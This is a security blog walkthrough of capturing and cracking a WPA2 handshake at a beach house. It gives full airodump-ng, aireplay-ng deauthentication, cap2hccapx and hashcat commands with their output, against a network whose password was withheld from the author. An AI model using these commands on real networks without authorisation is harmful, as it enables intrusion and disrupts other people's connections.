Hashcat WPA2 Cracking – Beach Edition

As a perfect follow-up to our Wireless CTF win, I present some hashcat WPA2 cracking.

The Challenge

I headed to the beach right after DEF CON, to spend some time with Hacker’s Girlfriend and her family.

My first day there the girlfriend told me, “If you don’t come to the beach with me, then I won’t give you the Wi-Fi password.” Unfortunately, there were two problems with this scenario. The first was that I had plenty of books, beer, or 4G signal, to keep myself busy for a few days. The second, and most import as I explained to her, was that I had just recently come back from winning a wireless hacking competition at DEF CON.

I still went down to the beach with her, but I decided to prove my point a bit later.

Finding the Network

Shortly after dinner, she went off shopping, so I got to work.

First, I made sure that I connected and properly configured my wireless card.

root@kali32:~# iwconfig
wlan0     IEEE 802.11bgn  ESSID:off/any 
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

Then, I needed to find the network. This was easy enough with , as it was the AP with the highest power.

root@kali32:~# airodump-ng wlan0
 CH 10 ][ Elapsed: 18 s ][ 2017-08-01 21:15                                         

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:25:xx:xx:xx:xx   -1        0        0    0  -1  -1                           
 00:23:xx:xx:xx:xx  -48       27      254    0  11  54e  WPA2 CCMP   PSK  beachbreeze       
 00:1D:xx:xx:xx:xx  -64       31        3    0  11  54e  WPA2 CCMP   PSK  xxxxxxxx       

Capturing the Traffic

Next, I needed to capture and log the traffic to this AP.

The first thing I did was place my interface into monitor mode.

root@kali32:~# airmon-ng start wlan0 11

Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  328 NetworkManager
  767 wpa_supplicant

PHY    Interface    Driver        Chipset

phy0    wlan0        ath9k_htc    Atheros Communications, Inc. AR9271 802.11n

        (mac80211 monitor mode already enabled for [phy0]wlan0 on [phy0]11)

Then, I pointed airodump at the proper SSID, and began saving the output to wpa-breeze.

root@kali32:~# airodump-ng --bssid 00:23:xx:xx:xx:xx -c 11 --write wpa-breeze wlan0


I figured it would be simple enough to capture a handshake, since the kids (and adults) needed their Wi-Fi.

In this case, since I wasn’t worried about a short outage, I decided to just send 25 broadcast deauths to speed things along.

root@kali32:~# aireplay-ng --deauth 25 -a 00:23:xx:xx:xx:xx wlan0
21:23:24  Waiting for beacon frame (BSSID: 00:23:xx:xx:xx:xx) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c ).
21:23:24  Sending DeAuth to broadcast -- BSSID: [00:23:xx:xx:xx:xx]
21:23:25  Sending DeAuth to broadcast -- BSSID: [00:23:xx:xx:xx:xx]
21:23:25  Sending DeAuth to broadcast -- BSSID: [00:23:xx:xx:xx:xx]

As a result, I was able to quickly capture a new WPA handshake.

 CH 11 ][ Elapsed: 4 mins ][ 2017-08-01 21:27 ][ WPA handshake: 00:23:xx:xx:xx:xx       

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:23:xx:xx:xx:xx  -44  92     2506    72556   76  11  54e  WPA2 CCMP   PSK  beachbreeze 

File Conversion

For those of you unfamiliar, hashcat WPA2 cracking requires .hccapx files.

In this case, I needed to convert my .cap to a .hccapx so that I could crack it using hashcat.

First, I downloaded the hashcat-utils.

Rays-MacBook-Pro:tools doyler$ git clone https://github.com/hashcat/hashcat-utils
Cloning into 'hashcat-utils'...
remote: Counting objects: 391, done.
remote: Total 391 (delta 0), reused 0 (delta 0), pack-reused 391
Receiving objects: 100% (391/391), 110.78 KiB | 106.00 KiB/s, done.
Resolving deltas: 100% (250/250), done.

Next, I built all the utils in the src directory.

Rays-MacBook-Pro:src doyler$ pwd
Rays-MacBook-Pro:src doyler$ make
rm -f ../bin/*
rm -f *.bin *.exe
cc -Wall -W -pipe -O2 -std=gnu99  -o cap2hccapx.bin cap2hccapx.c
cc -Wall -W -pipe -O2 -std=gnu99  -o cleanup-rules.bin cleanup-rules.c
cc -Wall -W -pipe -O2 -std=gnu99  -o combinator.bin combinator.c
cc -Wall -W -pipe -O2 -std=gnu99  -o combinator3.bin combinator3.c
cc -Wall -W -pipe -O2 -std=gnu99  -o combipow.bin combipow.c
cc -Wall -W -pipe -O2 -std=gnu99  -o ct3_to_ntlm.bin ct3_to_ntlm.c
cc -Wall -W -pipe -O2 -std=gnu99  -o cutb.bin cutb.c
cc -Wall -W -pipe -O2 -std=gnu99  -o expander.bin expander.c
cc -Wall -W -pipe -O2 -std=gnu99  -o gate.bin gate.c
cc -Wall -W -pipe -O2 -std=gnu99  -o generate-rules.bin generate-rules.c
cc -Wall -W -pipe -O2 -std=gnu99  -o hcstatgen.bin hcstatgen.c
cc -Wall -W -pipe -O2 -std=gnu99  -o hcstat2gen.bin hcstat2gen.c
cc -Wall -W -pipe -O2 -std=gnu99  -o keyspace.bin keyspace.c
cc -Wall -W -pipe -O2 -std=gnu99  -o len.bin len.c
cc -Wall -W -pipe -O2 -std=gnu99  -o mli2.bin mli2.c
cc -Wall -W -pipe -O2 -std=gnu99  -o morph.bin morph.c
cc -Wall -W -pipe -O2 -std=gnu99  -o permute.bin permute.c
cc -Wall -W -pipe -O2 -std=gnu99  -o permute_exist.bin permute_exist.c
cc -Wall -W -pipe -O2 -std=gnu99  -o prepare.bin prepare.c
cc -Wall -W -pipe -O2 -std=gnu99  -o req-include.bin req-include.c
cc -Wall -W -pipe -O2 -std=gnu99  -o req-exclude.bin req-exclude.c
cc -Wall -W -pipe -O2 -std=gnu99  -o rli.bin rli.c
cc -Wall -W -pipe -O2 -std=gnu99  -o rli2.bin rli2.c
cc -Wall -W -pipe -O2 -std=gnu99  -o rules_optimize.bin rules_optimize.c cpu_rules.c
cc -Wall -W -pipe -O2 -std=gnu99  -o splitlen.bin splitlen.c
cc -Wall -W -pipe -O2 -std=gnu99  -o strip-bsr.bin strip-bsr.c
cc -Wall -W -pipe -O2 -std=gnu99  -o strip-bsn.bin strip-bsn.c

Finally, I used cap2hccapx to convert the .cap file to a .hccapx file.

Rays-MacBook-Pro:src doyler$ ./cap2hccapx.bin ~/Documents/_CTFs_/wpa/wpa-breeze-01.cap ~/Documents/_CTFs_/wpa/breeze.hccapx
Networks detected: 1

[*] BSSID=00:23:xx:xx:xx:xx ESSID=beachbreeze (Length: 11)
 --> STA=4c:66:xx:xx:xx:xx, Message Pair=0, Replay Counter=0
 --> STA=4c:66:xx:xx:xx:xx, Message Pair=2, Replay Counter=0
 --> STA=c0:18:xx:xx:xx:xx, Message Pair=2, Replay Counter=0

Written 3 WPA Handshakes to: /Users/doyler/Documents/_CTFs_/wpa/breeze.hccapx

Hashcat WPA2 Cracking

With the .hccapx file in hand, cracking it with hashcat was a breeze.

I used the the following flags and options to actually perform the cracking.

  • -m 2500 = WPA/WPA2 hashe mode
  • -r ~/tools/cracking/best64.rule = using my best64 as a rule to modify the dictionary
  • -d 2,3 = telling hashcat to only use devices 2 and 3 on my machine (skipping my CPU)
  • breeze.hccapx = the .hccapx I was trying to crack
  • ~/tools/cracking/rockyou.txt = the location of my rockyou dictionary
Rays-MacBook-Pro:wpa doyler$ hashcat -m 2500 -r ~/tools/cracking/best64.rule -d 2,3 breeze.hccapx ~/tools/cracking/rockyou.txt
hashcat () starting...

OpenCL Platform #1: Apple
* Device #1: Intel(R) Core(TM) i7-6920HQ CPU @ 2.90GHz, skipped.
* Device #2: Intel(R) HD Graphics 530, 384/1536 MB allocatable, 24MCU
* Device #3: AMD Radeon Pro 460 Compute Engine, 1024/4096 MB allocatable, 16MCU

Hashes: 3 digests; 2 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 77

Applicable optimizers:
* Zero-Byte
* Single-Salt
* Slow-Hash-SIMD

Watchdog: Temperature abort trigger disabled.
Watchdog: Temperature retain trigger disabled.

Dictionary cache built:
* Filename..: /Users/doyler/tools/cracking/rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 1104433792

[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit => s

Session..........: hashcat
Status...........: Running
Hash.Type........: WPA/WPA2
Hash.Target......: breeze.hccapx
Time.Started.....: Wed Aug  2 19:51:57 2017 (4 secs)
Time.Estimated...: Thu Aug  3 00:47:28 2017 (4 hours, 55 mins)
Guess.Base.......: File (/Users/doyler/tools/cracking/rockyou.txt)
Guess.Mod........: Rules (/Users/doyler/tools/cracking/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#2.....:     2713 H/s (7.96ms)
Speed.Dev.#3.....:    58856 H/s (8.08ms)
Speed.Dev.#*.....:    61549 H/s
Recovered........: 0/2 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 12866667/1104433792 (1.17%)
Rejected.........: 12686443/12866667 (98.60%)
Restore.Point....: 0/14343296 (0.00%)
Candidates.#2....: 123456789 -> 09876543210
Candidates.#3....: 20032003 -> ARCTICCAT


Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA/WPA2
Hash.Target......: breeze.hccapx
Time.Started.....: Wed Aug  2 19:51:57 2017 (5 secs)
Time.Estimated...: Wed Aug  2 19:52:02 2017 (0 secs)
Guess.Base.......: File (/Users/doyler/tools/cracking/rockyou.txt)
Guess.Mod........: Rules (/Users/doyler/tools/cracking/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#2.....:     5192 H/s (8.00ms)
Speed.Dev.#3.....:    58907 H/s (8.08ms)
Speed.Dev.#*.....:    64099 H/s
Recovered........: 2/2 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 12981355/1104433792 (1.18%)
Rejected.........: 12686443/12981355 (97.73%)
Restore.Point....: 0/14343296 (0.00%)
Candidates.#2....: 123456789 -> 09876543210
Candidates.#3....: 20032003 -> ARCTICCAT

Started: Wed Aug  2 19:51:52 2017
Stopped: Wed Aug  2 19:52:03 2017

Furthermore, once I had everything setup, it only took hashcat 11 seconds to crack the password!

Hashcat WPA2 Cracking – Conclusion

While this was a simpler network to get into, it was still a fun challenge. That, plus this was a great way to show a challenge that we faced during the wireless CTF. Note that this was a network that I had access to due to our staying there. I do not recommend attacking networks that you do not control or own without permission.

In the end, the password worked, and I was able to connect to the network!

Hashcat WPA2 Cracking - Connected

doyler on Githubdoyler on Twitter
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he's done it all. To show for it, he has obtained an OSCP, eCPPT, eWPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Senior Penetration Testing Consultant for SecureWorks. His previous position was a Senior Penetration Tester for a major financial institution.

When he's not figuring out what cert to get next (OSCE?!) or side project to work on, he enjoys playing video games, traveling, and watching sports.

Leave a Comment

Filed under Security Not Included

Leave a Reply

Your email address will not be published. Required fields are marked *